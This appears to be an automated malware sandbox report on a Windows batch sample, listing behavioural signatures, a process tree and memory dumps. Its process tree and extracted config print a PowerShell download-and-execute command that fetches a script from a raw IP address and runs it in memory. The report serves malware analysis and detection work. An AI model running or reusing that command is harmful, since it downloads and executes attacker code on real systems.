Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    149s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    LzkNcv75.bat

  • Sample

    191216-hbth798x4j

  • SHA256

    ceaa40264cb666d0b5eab3ed3492570aef8d3b8b87114a93236e714112c31355

Score
10/10
discoveryevasionspywaretrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/LzkNcv75

Signatures

  • Program crash 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Drops file in Windows directory 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for installed software on the system 1 TTPs 63 IoCs
    discovery
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LzkNcv75.bat"
    1⤵
      PID:5032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/LzkNcv75');Invoke-VOZZHNQCE;Start-Sleep -s 10000"
        2⤵
          PID:4156
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4156 -s 704
            3⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k WerSvcGroup
        1⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        PID:4188
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
        1⤵
          PID:4384
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
          1⤵
            PID:384
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
            1⤵
            • Drops file in System32 directory
            PID:4752
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3860
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wisvc
            1⤵
              PID:4412
            • C:\Windows\system32\SppExtComObj.exe
              C:\Windows\system32\SppExtComObj.exe -Embedding
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3776
              • C:\Windows\System32\SLUI.exe
                "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                2⤵
                  PID:4288
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                1⤵
                • Drops file in Windows directory
                PID:4852
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                1⤵
                  PID:3100
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                  1⤵
                    PID:4512
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k unistacksvcgroup
                    1⤵
                      PID:4356
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                      1⤵
                        PID:4080

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF36.tmp.csv
                        Download Submit

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF57.tmp.txt
                        Download Submit

                      • memory/1980-20-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-7-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-6-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-21-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-8-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-22-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-10-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-11-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-12-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-13-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-14-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-15-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-16-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-17-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-18-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-19-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-1-0x0000000005040000-0x0000000005041000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-5-0x0000000005130000-0x0000000005131000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-9-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-23-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-24-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-25-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-26-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-27-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-28-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-29-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-30-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-31-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-32-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-33-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-34-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-35-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-4-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-0-0x0000000004970000-0x0000000004971000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/1980-39-0x0000000005030000-0x0000000005032000-memory.dmp

                        Filesize

                        8KB

                        Download